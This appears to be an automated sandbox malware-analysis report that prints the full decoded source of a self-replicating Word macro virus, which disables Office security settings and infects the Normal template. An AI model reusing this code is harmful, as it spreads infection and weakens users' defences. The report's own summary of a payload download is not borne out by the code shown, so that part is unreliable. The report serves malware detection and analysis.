Verdict: MALICIOUS
Risk Score: 128

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro that is triggered by the Document_Open event. This macro attempts to disable security settings and download a temporary file to the system's TEMP directory. The macro also modifies registry keys related to Office security and attempts to execute a downloaded payload, indicating a downloader or dropper functionality.
Heuristics (4)
- ClamAV: Win.Trojan.Psycho-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Psycho-3
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5552 bytes | 9105db495f750f0da90f85af594a5f7c0977c992182c5c059784793ac3f6ef24 |
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Shadow
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = (0)
Options.SaveNormalPrompt = (0)
Application.DisplayAlerts = (0)
Application.ScreenUpdating = (0)
Application.EnableCancelKey = (0)
γ = Environ("WINDIR") & ".\TEMP\"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Do While FileLen(γ & System.ProfileString("", "DefaultFileName")) = 0
Randomize: α = "~WR00000.TMP": Mid(α, 4, 1) = Chr(Int((26 * Rnd) + 65)): Mid(α, 8, 1) = Int(Rnd() * 10)
VBProject.VBComponents(1).Export (γ & α)
Open γ & α For Input As #1
For η = 1 To 4: Line Input #1, �: Next: η = ""
Do Until ι = "'�"
Line Input #1, ι
η = η & ι & Chr(13) & Chr(10)
Loop: Close #1
Open γ & α For Output As #1: Print #1, η: Close #1
System.ProfileString("", "DefaultFileName") = α: Loop
Set α = IIf(MacroContainer <> NormalTemplate, NormalTemplate, ActiveDocument).VBProject.VBComponents(1)
If α.CodeModule.CountOfLines > 0 Or ActiveDocument.Path = "" Then Exit Sub
α.CodeModule.AddFromFile γ & System.ProfileString("", "DefaultFileName")
α.CodeModule.Replaceline 2, "Private Sub " & IIf(MacroContainer <> NormalTemplate, "Document_Open()", "Document_Close()")
End Sub
'�
```